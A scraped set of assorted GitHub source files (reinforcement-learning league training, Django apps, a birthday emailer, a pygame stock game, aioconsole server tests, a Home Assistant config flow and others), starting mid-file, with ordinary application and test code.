server_configuration=DockerServerConfiguration,\n team=team_builder,\n player_configuration=PlayerConfiguration(\n username=f\"rltrainer\", password=\"rltrainer1234\"\n ),\n )\n\n opponent = LeaguePlayer(\n device=agent.device,\n network=agent.network,\n preprocessor=preprocessor,\n sample_moves=args.sample_moves,\n max_concurrent_battles=10,\n server_configuration=DockerServerConfiguration,\n team=AgentTeamBuilder(),\n training_team=team_builder,\n battle_format=args.battle_format,\n player_configuration=PlayerConfiguration(\n username=f\"rlopponent\", password=\"rlopponent1234\"\n ),\n )\n\n for e in range(epoch, epoch + args.nb_steps // args.epoch_len):\n agent.save_model(e, network, preprocessor, team_builder)\n save_args(agent_dir=league_path.agent, args=args.dict_args, epoch=e)\n team_builder.save_team()\n\n player.play_against(\n env_algorithm=league_epoch,\n opponent=opponent,\n env_algorithm_kwargs={\n \"agent\": agent,\n \"opponent\": opponent,\n \"matchmaker\": matchmaker,\n \"skill_tracker\": skill_tracker,\n \"epoch_len\": args.epoch_len,\n \"step_counter\": step_counter,\n \"epoch\": e,\n },\n )\n skill_tracker.save_skill_ratings(e)\n\n if beating_league(agent):\n move_to_league(\n agent_path=league_path.agent,\n league_dir=league_path.league,\n tag=agent.tag,\n epoch=e,\n )\n break\n","repo_name":"alex-nooj/champion_league","sub_path":"champion_league/training/league/league_play.py","file_name":"league_play.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74789833127","text":"from itertools import combinations\n\nn, m = map(int, input().split())\nice = list(combinations(range(1, n+1), 3))\n\n# n x n의 2차원 배열 -> 맛 없는 아이스크림 조합 체크\nno_mat = [[0] * (n+1) for _ in range(n+1)]\n\nfor _ in range(m):\n x, y = map(int, input().split())\n no_mat[x][y] = 1\n no_mat[y][x] = 1\n\nans = 0\nfor x in ice:\n # 하나라도 체크되어 있으면\n if no_mat[x[0]][x[1]] or no_mat[x[0]][x[2]] or no_mat[x[1]][x[2]]:\n continue\n ans += 1\n\nprint(ans)","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/순열과 조합/2422.py","file_name":"2422.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10525718524","text":"import pandas as pd\nimport random\nimport datetime as dt\nimport smtplib\n\ndata = pd.read_csv(\"birthdays.csv\")\nnames = data[\"name\"]\nemails = data[\"email\"]\ndates = data[\"day\"]\nmonths = data[\"month\"]\nyears = data[\"year\"]\n\nwith open(\"quotes.txt\") as file:\n quotes = file.readlines()\n quote = random.choice(quotes)\n\ndef send_wishes(to, message):\n connection = smtplib.SMTP(\"smtp.gmail.com\")\n # connection.ehlo()\n connection.starttls()\n connection.login(\"<your email here>\", \"<your password here>\")\n connection.sendmail(\"<your email here>\", to, f\"Subject: Happy Birthday!!\\n\\n{message}\\nAnd here's quote for you as a gift:\\n{quote}\")\n connection.close()\n\ndef select_random_letter():\n letter_num = random.randint(1, 3)\n with open(f\".\\letter_templates\\letter_{letter_num}.txt\") as file:\n letter = file.read()\n\n return letter\n\ndef check_birthday():\n for name, email, date, month, year in zip(data[\"name\"], data[\"email\"], data[\"day\"], data[\"month\"], data[\"year\"]):\n if dt.datetime.now().day == date and dt.datetime.now().month == month:\n birthday_letter = select_random_letter()\n birthday_letter = birthday_letter.replace(\"[NAME]\", f\"{name}\").replace(\"[year]\", f\"{dt.datetime.now().year - year}\")\n send_wishes(email, birthday_letter)\n\n\ncheck_birthday()\n\n# 3. If step 2 is true, pick a random letter from letter templates and replace the [NAME] with the person's actual name from birthdays.csv\n\n# 4. Send the letter generated in step 3 to that person's email address.\n","repo_name":"AakashChahal/100DaysOfCode","sub_path":"birthday-wisher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33384367371","text":"from django.urls import path\nfrom WEB_BLOG.views import blog, edicionUsuario, fotoPerfil, buscar, crearPost, MandarMensajes\nfrom WEB_LR.views import salir\n\n\n\nurlpatterns = [\n path('blog1/', blog, name='blog'),\n path('salir/', salir, name=\"salir\"),\n path(\"editarPerfil/\", edicionUsuario, name='editarPerfil'),\n path(\"fotoPerfil/\", fotoPerfil, name=\"fotoPerfil\"),\n path(\"buscar/\", buscar, name=\"buscar\"),\n path(\"crear/\", crearPost, name=\"crear\"),\n path(\"chat/\", MandarMensajes, name=\"chat\"),\n]","repo_name":"Rodrigo-M-Medina/-Playground","sub_path":"WEB_BLOG/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17701062123","text":"import sys\nimport collections\nsys.path.append('../graph_neural_net/')\nimport graph_construction, utils\nfrom typing import Dict, Tuple, Counter\nimport numpy as np\n\n[a, graphs_train, b, graphs_test, index_maps] = utils.load_train_test_data('train_test_full')\ngraphs_train, graphs_test = utils.flatten(graphs_train), utils.flatten(graphs_test)\nast_type_index_map, edge_type_index_map, label_index_map = index_maps\n\nprint(len(a))\nprint(a[0])\nprint(len(graphs_train))\n#print(graphs_train[0])\nprint(\"--\")\nprint(len(b))\nprint(b[0])\nprint(len(graphs_test))\n#print(graphs_test[0])\nprint('--')\nprint(len(ast_type_index_map))\nprint(len(edge_type_index_map))\nprint('--')\ndef get_edges(graph):\n ed = 0\n for g in graph:\n ed += len(g['edges'])\n return ed\nprint(get_edges(graphs_train))\nprint(get_edges(graphs_test))\n\n# This code is a clone of\n# a part of graph_construction.graphs_json_to_graph_tuple_and_labels\ndef get_labels(graph):\n node_index_map: Dict[Tuple[int, int], int] = {}\n n_nodes = np.array(list(len(g['nodes']) for g in graph))\n\n for g_idx, g in enumerate(graph):\n for n in g['nodes']:\n nid = n['id']\n if (g_idx, nid) in node_index_map:\n raise ValueError('Duplicate node in graph {}: id {}'.format(g_idx + 1, nid))\n nidx = len(node_index_map)\n node_index_map[(g_idx, nid)] = nidx\n labels = []\n offset = 0\n for g_idx, g in enumerate(graph):\n g_labels = {}\n for l in g['labels']:\n g_labels[node_index_map[(g_idx, l['node'])] - offset] = label_index_map[l['label']]\n offset += n_nodes[g_idx]\n labels.append(g_labels)\n \n print(\"n_nodes: {}\".format(len(n_nodes)))\n sum_n = 0\n for n in n_nodes:\n sum_n += n\n print(\"# nodes: {}\".format(sum_n))\n return labels\n\nlabels_train = get_labels(graphs_train)\nlabels_test = get_labels(graphs_test)\n\ndef get_label_counter(labels):\n label_counter = Counter[int]() \n for g in labels:\n label_counter.update(list(g.values()))\n return label_counter\n\nlabel_counter_train = get_label_counter(labels_train)\nlabel_counter_test = get_label_counter(labels_test)\n\nmajority_vote = label_counter_train.most_common(3)\n\ndef get_accuracy(counter_obj, majority_vote):\n correct = counter_obj[majority_vote]\n total = sum(counter_obj.values())\n print(\"total : {}\".format(total))\n return correct, total, \"{0:.0%}\".format(correct/total)\n\nfor i in range(len(majority_vote)):\n c_train, t_train, acc_train = get_accuracy(label_counter_train, majority_vote[i][0])\n c_test, t_test, acc_test = get_accuracy(label_counter_test, majority_vote[i][0])\n lbl_name = \"-\"\n for k, v in label_index_map.items():\n if v == majority_vote[i][0]:\n lbl_name = k\n print(\"Label {} when set as the prediction across labels -- \".format(lbl_name))\n print((c_train, t_train, acc_train))\n print((c_test, t_test, acc_test))\n print('==')","repo_name":"shashank-srikant/6.867_term_project","sub_path":"src/experiments/baseline1_majority_vote.py","file_name":"baseline1_majority_vote.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13994516566","text":"from student import *\n\n\ndef read_account(path):\n f = open(path, \"r\", encoding=\"utf-8\")\n list_account = []\n for line in f:\n items = line.split(\"|\")\n account = {\n \"username\": items[0],\n \"password\": items[1]\n }\n list_account.append(account)\n return list_account\n\n\ndef check_account(lst_acc, username, password):\n check = False\n for i in lst_acc:\n if i[\"username\"] == username and i[\"password\"] == password:\n check = True\n return check\n\n\ndef read_data_student(path):\n f = open(path, \"r\", encoding=\"utf-8\")\n list_students = ListStudent([])\n for line in f:\n items = line.split(\",\")\n code = str(items[0])\n name = items[1]\n age = int(items[2])\n gender = True if items[3] == \"True\" else False\n address = items[4]\n math_point = float(items[5])\n physics_point = float(items[6])\n chem_point = float(items[7])\n student = Student(code, name, age, gender, address, math_point, physics_point, chem_point, )\n list_students.add_new(student)\n return list_students\n\n\ndef write_new_line(path, student):\n string = student.__str__()\n with open(path, \"a\", encoding=\"utf-8\") as f:\n f.write(f\"{string}\\n\")\n\n\ndef remove_line(path, index):\n with open(path, 'r', encoding=\"utf-8\") as file:\n lines = file.readlines()\n del lines[index]\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(lines)\n\n\ndef update_line(path, index):\n with open(path, 'r', encoding=\"utf-8\") as file:\n lines = file.readlines()\n del lines[index]\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(lines)\n\n\ndef update(path, index):\n with open(path, 'r') as file:\n data = file.readlines()\n data[index] = \"huân \"\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(data)\n\n\ndef write_down_file(path, list_student):\n with open(path, 'w') as file:\n for student in list_student:\n file.writelines(student.__str__()+\"\\n\")\n\n# remove_line(\"data/list_students.txt\", 7)\n# read_data_student(\"data/list_students.txt\")\n","repo_name":"Nguyen-huan/case-study","sub_path":"manipulationData.py","file_name":"manipulationData.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010416487","text":"# -*- coding:utf-8 -*-\n\n#\nimport logging\nimport os\n\n# maya\nimport pymel.core as pm\n\nfrom mbox import menu\n# mbox\nfrom mbox import version\n\nmenu_id = \"mBox\"\nlogger = logging.getLogger()\n\n\ndef environ():\n os.environ[\"MBOX_ROOT\"] = os.path.normpath(os.path.join(__file__, os.path.pardir, os.path.pardir, os.path.pardir))\n os.environ[\"MBOX_PYTHON\"] = os.path.normpath(os.path.dirname(__file__))\n os.environ[\"MBOX_MODULES\"] = os.path.normpath(os.path.join(os.path.dirname(__file__), \"box\", \"modules\"))\n os.environ[\"MBOX_BOX\"] = os.path.normpath(os.path.join(os.environ[\"MBOX_PYTHON\"], \"lego\", \"box\"))\n os.environ[\"MBOX_CUSTOM_BOX\"] = \"\"\n os.environ[\"MBOX_CUSTOM_MODULES\"] = \"\"\n os.environ[\"MBOX_CUSTOM_STEP_PATH\"] = \"\"\n\n\ndef mbox_menu():\n \"\"\"mbox menu setup\n\n :return:\n \"\"\"\n menu.create(menu_id)\n\n\ndef about():\n \"\"\"\n\n :return:\n \"\"\"\n mbox_msg = (\"\\nmbox version : {0}\\n\\n\"\n \"mbox started with the aim of studying mgear. Therefore, most core functions come from mgear. \"\n \"mgear is the best rigging framework. But mgear's inheritance was a bit complicated for me. \"\n \"So I think I revised it in an easier way. \"\n \"My programming level is still low, so things I've changed may have gone in the wrong direction.\\n\\n\"\n \"\".format(version.mbox))\n\n mbox_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n license_file = os.path.join(mbox_dir, \"LICENSE\")\n with open(license_file, \"r\") as f:\n license_msg = f.readlines()\n for l_msg in license_msg:\n mbox_msg += \"{0}\".format(l_msg)\n\n pm.confirmDialog(title=\"About mbox\",\n message=mbox_msg,\n button=[\"OK\"],\n defaultButton=\"OK\",\n cancelButton=\"OK\",\n dismissString=\"OK\")\n","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36921082490","text":"import csv\nimport os\nimport random\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom sales.models.product import Product\nfrom sales.models.sale import Sale\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n help = 'Fills the Seller table with data'\n\n def handle(self, *args, **options):\n path = 'sales/management/files/sales.csv'\n file_exists = os.path.exists(path)\n if not file_exists:\n self.stdout.write(self.style.ERROR('Directory Not Found'))\n return None\n\n user_ids = list(User.objects.all().values_list('id', flat=True))\n with open(path, 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n # assign sale to random user\n sale = Sale(\n date=row[0],\n sales_number=row[1],\n revenue=row[2],\n product=Product.objects.get(name=row[3]),\n user_id=User.objects.get(id=random.choice(user_ids)))\n sale.save()\n line_count += 1\n self.stdout.write(self.style.SUCCESS(f'Successfully imported {line_count} sales'))\n","repo_name":"5DcOOKIE/Haseeb_Arshad_Assignment_ROUND2","sub_path":"sales/management/commands/fill_sales.py","file_name":"fill_sales.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22307307832","text":"from Backend.backgroundEvents.base import BaseEvent\nfrom Backend.bungio.client import get_bungio_client\nfrom Backend.core.errors import CustomException\nfrom Backend.crud import persistent_messages, rss_feed\nfrom Backend.database.base import acquire_db_session\nfrom Backend.networking.elevatorApi import ElevatorApi\n\n\nclass RssFeedChecker(BaseEvent):\n \"\"\"Checks for new Bungie Articles\"\"\"\n\n def __init__(self):\n interval_minutes = 5\n super().__init__(scheduler_type=\"interval\", interval_minutes=interval_minutes)\n\n async def run(self):\n bungio_client = get_bungio_client()\n news = await bungio_client.api.rss_news_articles(page_token=\"0\", includebody=False)\n\n async with acquire_db_session() as db:\n # loop through the articles and check if they have been published\n to_publish = []\n for item in news.news_articles:\n if not await rss_feed.get(db=db, item_id=item.unique_identifier):\n to_publish.append(item)\n else:\n # dont need to re-check all of them every time\n break\n\n if to_publish:\n # get all guilds that have subscribed\n subscribed_data = []\n for subscribed in await persistent_messages.get_all_name(db=db, message_name=\"rss\"):\n subscribed_data.append(\n {\n \"guild_id\": subscribed.guild_id,\n \"channel_id\": subscribed.channel_id,\n }\n )\n\n # loop through the items to publish and do that\n try:\n elevator_api = ElevatorApi()\n for item in to_publish:\n data = {\n \"embed_title\": item.title,\n \"embed_description\": f\"[{item.description}]({bungie_url(item.link)})\",\n \"embed_image_url\": item.image_path,\n \"guilds\": subscribed_data,\n }\n\n # send the payload to elevator\n result = await elevator_api.post(\n route=\"/messages\",\n json=data,\n )\n\n # remove db entry if channel doesnt exist\n if result:\n if not result.content[\"success\"]:\n for error_guild in result.content[\"guilds\"]:\n await persistent_messages.delete(\n db=db, message_name=\"rss\", guild_id=error_guild[\"guild_id\"]\n )\n\n # save item in DB\n await rss_feed.insert(db=db, item_id=item.unique_identifier)\n except CustomException:\n pass\n\n\ndef bungie_url(url: str) -> str:\n if \"bungie.net\" not in url:\n url = f\"https://www.bungie.net{url}\"\n return url\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/backgroundEvents/rssFeedChecker.py","file_name":"rssFeedChecker.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"16111019329","text":"import io\nimport asyncio\n\nimport pytest\n\nfrom aioconsole import compat\nfrom aioconsole.server import start_console_server, print_server\n\n\n@pytest.mark.asyncio\nasync def test_server(event_loop):\n server = await start_console_server(host=\"127.0.0.1\", port=0, banner=\"test\")\n address = server.sockets[0].getsockname()\n\n stream = io.StringIO()\n print_server(server, \"test console\", file=stream)\n expected = f\"The test console is being served on 127.0.0.1:{address[1]}\\n\"\n assert stream.getvalue() == expected\n\n reader, writer = await asyncio.open_connection(*address)\n assert (await reader.readline()) == b\"test\\n\"\n writer.write(b\"1+1\\n\")\n assert (await reader.readline()) == b\">>> 2\\n\"\n writer.write_eof()\n assert (await reader.readline()) == b\">>> \\n\"\n writer.close()\n await writer.wait_closed()\n server.close()\n await server.wait_closed()\n\n\n@pytest.mark.asyncio\nasync def test_uds_server(event_loop, tmpdir_factory):\n path = str(tmpdir_factory.mktemp(\"uds\") / \"my_uds\")\n\n # Not available on windows\n if compat.platform == \"win32\":\n with pytest.raises(ValueError):\n await start_console_server(path=path, banner=\"test\")\n return\n\n server = await start_console_server(path=path, banner=\"test\")\n\n stream = io.StringIO()\n print_server(server, \"test console\", file=stream)\n expected = f\"The test console is being served on {path}\\n\"\n assert stream.getvalue() == expected\n\n address = server.sockets[0].getsockname()\n reader, writer = await asyncio.open_unix_connection(address)\n assert (await reader.readline()) == b\"test\\n\"\n writer.write(b\"1+1\\n\")\n assert (await reader.readline()) == b\">>> 2\\n\"\n writer.write_eof()\n assert (await reader.readline()) == b\">>> \\n\"\n writer.close()\n await writer.wait_closed()\n server.close()\n await server.wait_closed()\n\n\n@pytest.mark.asyncio\nasync def test_invalid_server(event_loop):\n with pytest.raises(ValueError):\n await start_console_server()\n with pytest.raises(ValueError):\n await start_console_server(path=\"uds\", port=0)\n","repo_name":"vxgmichel/aioconsole","sub_path":"tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":425,"dataset":"github-code","pt":"53"} +{"seq_id":"70161941927","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Define the system parameters\nM = np.eye(2) # identity matrix\nK = np.array([[1, -1], [-1, 1]]) # stiffness matrix\nT0 = 1.0 # amplitude of applied moment\nOmega = 2.0 * np.pi # frequency of applied moment\n\n# Solve the generalized eigenvalue problem to find natural frequencies and mode shapes\nevals, evecs = np.linalg.eig(np.linalg.inv(M) @ K)\nomegas = np.sqrt(-evals)\nmodes = evecs.T\n\n# Define the frequency range to calculate the frequency response function\nw = np.linspace(0, 10, 1000)\n\n# Calculate the frequency response function for each natural frequency and mode shape\nHw = np.zeros_like(w, dtype=np.complex128)\nfor i, omega in enumerate(omegas):\n mode = modes[i]\n num = T0 * mode[0] * omega**2\n den = (1j*w)**2 + 2*0.01*omega*1j*w + omega**2\n Hw += num / den\n\n# Plot the magnitude and phase of the frequency response function\nfig, ax = plt.subplots(2, 1)\nax[0].plot(w, abs(Hw))\nax[0].set_ylabel('Magnitude')\nax[1].plot(w, np.angle(Hw))\nax[1].set_ylabel('Phase')\nax[1].set_xlabel('Frequency')\nplt.show()\n","repo_name":"LorenzoCucchi/Lecture-Notes","sub_path":"Aeroelasticity/notes/exercitation/01/prova.py","file_name":"prova.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7550002866","text":"import pandas as pd\nimport numpy as np\nimport re\n\n#PATH = 'queen2_exp_00001.dat'\n\n# def parse(path):\n# \tarr = []\n# \tdata = []\n# \twith open(path, 'r') as f:\n# \t\tfor dpt in f:\n# \t\t\tfor d in dpt.split(','):\n# \t\t\t\td=d.strip()\n# \t\t\t\tarr.append(d)\n# \t\t\tdata.append(arr)\n# \t\t\tarr=[]\n\n# \tdf = pd.DataFrame(data)\n# \t#print(df)\n\n# \t# df.to_csv(r'data.csv')\n# \treturn df\n\ndef parse(path):\n\tarr = []\n\tf = open(path, 'r')\n\tfor dp in f:\n\t\t\n\t\tarr.append(dp.split())\n\t\t# print(arr)\n\t\t# exit(0)\n\tf.close()\n\n\tdf = pd.DataFrame(arr)\n\tdf = df[1:]\n\tprint(df.head())\n\t# new_df = df[0].str.split(expand=True)\n\t# print(new_df.head())\n\n\t# df.to_csv(r'data.csv')\n\treturn df\n\nif __name__ == '__main__':\n\tpath = 'C:/Users/Tript/Desktop/What!/asme/cavity/postProcessing/probes/0'\n\n\t#get press data\n\tppath = path+'/p.dat'\n\n\t#get vel data\n\tvpath = path+'/U.dat'\n\tpass\n\n\tpdf = parse(ppath)\n\tpdf.to_csv(r'datap.csv', index=False)\n\n\tvdf = parse(vpath)\n\tvdf.to_csv(r'datav.csv', index=False)\n","repo_name":"TriptSharma/mlpiv","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24878229597","text":"\"\"\"List all records in a zone.\"\"\"\n# :license: MIT, see LICENSE for more details.\n\nimport click\n\nimport SoftLayer\nfrom SoftLayer.CLI import environment\nfrom SoftLayer.CLI import formatting\nfrom SoftLayer.CLI import helpers\n# pylint: disable=redefined-builtin, redefined-argument-from-local\n\n\n@click.command()\n@click.argument('zone')\n@click.option('--data', help='Record data, such as an IP address')\n@click.option('--record', help='Host record, such as www')\n@click.option('--ttl',\n type=click.INT,\n help='TTL value in seconds, such as 86400')\n@click.option('--type', help='Record type, such as A or CNAME')\n@environment.pass_env\ndef cli(env, zone, data, record, ttl, type):\n \"\"\"List all records in a zone.\"\"\"\n\n manager = SoftLayer.DNSManager(env.client)\n table = formatting.Table(['id', 'record', 'type', 'ttl', 'data'])\n\n table.align['ttl'] = 'l'\n table.align['record'] = 'r'\n table.align['data'] = 'l'\n\n zone_id = helpers.resolve_id(manager.resolve_ids, zone, name='zone')\n\n records = manager.get_records(zone_id,\n record_type=type,\n host=record,\n ttl=ttl,\n data=data)\n\n for the_record in records:\n table.add_row([\n the_record['id'],\n the_record['host'],\n the_record['type'].upper(),\n the_record['ttl'],\n the_record['data']\n ])\n\n env.fout(table)\n","repo_name":"itirohidaka/PowerOff-Functions","sub_path":"virtualenv/lib/python2.7/site-packages/SoftLayer/CLI/dns/record_list.py","file_name":"record_list.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24802298970","text":"import csv\nimport sys\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.use('Qt5Agg')\n\n\ndef main(filename):\n try:\n with open(filename, \"r\") as file:\n reader = csv.reader(file, 'excel')\n headers = []\n data = []\n for row in reader:\n if not headers:\n headers = list(row)\n index_need = headers.index(\"Motion\")\n else:\n data.append(list(row)[index_need])\n x = [i for i in range(len(data))]\n plt.plot(x, data)\n plt.show()\n\n\n except FileNotFoundError:\n print(\"Файл не найден\")\n\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n main(filename=sys.argv[1])\n else:\n print(\"Укажите название файла с записями\")\n","repo_name":"Bobako/4emodan","sub_path":"task8/view_results.py","file_name":"view_results.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9795259679","text":"import pygame\nimport os\nimport random\nimport math\nimport pandas\n\n\n\nclass Player(object):\n def __init__(self,market):\n self.money = 10000\n self.stocksInHand = [market[0].stock, market[1].stock, market[2].stock]\n self.stockAmount = [0,0,0]\n\n self.numStocks = 0\n self.maxNumStocks = 10\n \n def buyStocks(self, i, market):\n if market[i].amount <= 0 or self.money < market[i].stock.buyPrice:\n return\n market[i].amount -= 1 #asset\n self.stockAmount[i] += 1\n self.money -= market[i].stock.buyPrice\n\n def sellStocks(self, i, market):\n if self.stockAmount[i] <= 0:\n return\n market[i].amount += 1 #asset\n self.stockAmount[i] -= 1\n self.money += market[i].stock.sellPrice\n\nclass Stock(object):\n def __init__(self, name, buyPrice):\n self.name = name\n self.buyPrice = round(buyPrice,2)\n self.sellPrice = round(buyPrice,2)\n \n def updateStock(self, newPrice):\n self.sellPrice = round(newPrice,2)\n \n def updateMarketStock(self, newPrice):\n self.buyPrice = round(newPrice,2)\n self.sellPrice = round(newPrice,2)\n def __eq__(self,other):\n return type(other) == type(self) and self.name == other.name\n \n \n \nclass Asset(object):\n def __init__(self, amount, stock):\n self.amount = amount\n self.stock = stock\n \n def __repr__(self):\n return self.stock.name + \" \" + str(self.amount) + \" \" + str(self.stock.buyPrice) + \" \" + str(self.stock.sellPrice) +\\\n \" \"\n \nclass Calendar(object):\n def __init__(self):\n self.month = 1\n self.day = 1\n self.year = 2000\n \n def nextDay(self):\n self.day += 1\n \nclass Background(pygame.sprite.Sprite):\n def __init__(self, filePath):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale (pygame.image.load(os.path.join('Assets',\n 'Backgrounds',filePath)).convert(), (1200, 800))\n self.rect = self.image.get_rect()\n self.image.set_colorkey((0,0,0))\n self.rect.left = 0\n self.rect.top = 0\n \nclass Layer(pygame.sprite.Sprite):\n def __init__(self, x, y, filePath, scale):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'Backgrounds', filePath)).convert(), scale)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n \nclass Button(pygame.sprite.Sprite):\n def __init__(self, x, y, filePath, scale, action):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'Backgrounds',filePath)).convert(), scale)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.action = action\n \n def update(self,mousePos,click):\n if self.rect.left <= mousePos[0] <= self.rect.right and self.rect.top <= mousePos[1] <= self.rect.bottom:\n if click[0]:\n print(\"Click!\")\n self.action()\nclass SellButton(Button):\n def __init__(self, x, y, filePath, scale, action, player,market, index):\n super().__init__(x, y, filePath,scale, action)\n #self.action = {sell, buy}\n self.index = index\n self.player = player\n self.market = market\n\n def update(self, mousePos, click):\n if self.rect.left <= mousePos[0] <= self.rect.right and self.rect.top <= mousePos[1] <= self.rect.bottom:\n if click[0]:\n print(\"Click!\")\n if self.action == \"sell\":\n self.player.sellStocks(self.index, self.market)\n elif self.action == \"buy\":\n self.player.buyStocks(self.index, self.market)\n","repo_name":"CharlieLiu0616/HackCMU2019","sub_path":"Stock MLaster/Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6216045249","text":"from django.test import TestCase\nimport pytest\nfrom channels.testing import WebsocketCommunicator\n\nfrom trades.calculator import percentage_calculator\nfrom live import api\nfrom live.consumers import LiveConsumer\nfrom trades.management.commands import dbinsert\nfrom trades.models import CurrencyPair\n\n\n@pytest.mark.django_db(transaction=True)\n@pytest.mark.asyncio\nasync def test_my_consumer_connects(self):\n communicator = WebsocketCommunicator(LiveConsumer.as_asgi(), \"/ws/live/\")\n connected, subprotocol = await communicator.connect()\n assert connected\n await communicator.send(\n {\"action\": \"test_async_action\", \"pk\": 2, \"request_id\": 1}\n )\n\n response = await communicator.receive()\n\n assert response == {\n \"errors\": [],\n \"data\": {\"pk\": 2},\n \"action\": \"test_async_action\",\n \"response_status\": 200,\n \"request_id\": 1,\n }\n\n # Test on connection welcome message\n # user = await communicator.receive_from()\n # assert user == 'test'\n # Close\n await communicator.disconnect()\n\n\n\"\"\" Tests the calculator file \"\"\"\n\n\nclass CalculatorTestCase(TestCase):\n\n # Test the percentage calculator function\n def test_percentage_calculator(self):\n\n # Mock the data needed to run the function\n total_val = 1000\n partial_pos_val = 250\n partial_ne_val = -250\n\n # Checks if the result is what is expected with positive values\n self.assertEqual(percentage_calculator(total_val, partial_pos_val), 25)\n\n # Checks if the result is what is expected with negative values\n self.assertEqual(percentage_calculator(total_val, partial_ne_val), -25)\n\n\n\"\"\" Tests the api file functions\"\"\"\n\n\nclass ApiTestCase(TestCase):\n def setUp(self):\n self.fetcher = api.DataFetcher(\"EURUSD=X\", \"1d\", \"30m\")\n\n # Tests the get historical data function\n def test_get_historical_data(self):\n\n # Runs the function\n response = self.fetcher.get_historical_data()\n # Gets the open column from the response\n tick_open = response[\"Open\"]\n # Checks if the column has values\n self.assertTrue(len(tick_open))\n\n # Tests the convert ticker to line function\n def test_convert_ticker_to_line(self):\n\n # Creates a dictionary\n test_dict = {}\n fetcher_dict = self.fetcher.convert_ticker_to_line()\n # Checks if the function returns a dictionary\n self.assertTrue(type(fetcher_dict) == type(test_dict))\n\n # Tests the get real time data function\n def test_get_real_time_data(self):\n\n # Runs the function\n result = self.fetcher.get_real_time_data()\n\n # Verifies function is iterable\n self.assertTrue(len(result))\n\n\nclass DbInsert(TestCase):\n\n def test_dbinsert(self):\n\n initial_vals = len(CurrencyPair.objects.all())\n dbinsert.Command.handle(self)\n new_vals = len(CurrencyPair.objects.all())\n assert(new_vals > initial_vals)\n","repo_name":"Heightsdesign/forex_performance_tracker","sub_path":"tests/test_custom_files.py","file_name":"test_custom_files.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36232870305","text":"\"\"\"Config flow for njsPC-HA integration.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.data_entry_flow import FlowResult\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers import aiohttp_client\nfrom homeassistant.components import zeroconf, ssdp\nfrom urllib.parse import urlparse\n\n\nfrom homeassistant.const import CONF_HOST, CONF_PORT\n\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nSTEP_USER_DATA_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_HOST): str,\n vol.Required(CONF_PORT, default=4200): int,\n }\n)\n\n\nasync def validate_input(hass: HomeAssistant, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Validate the user input allows us to connect.\n\n Data has the keys from STEP_USER_DATA_SCHEMA with values provided by the user.\n 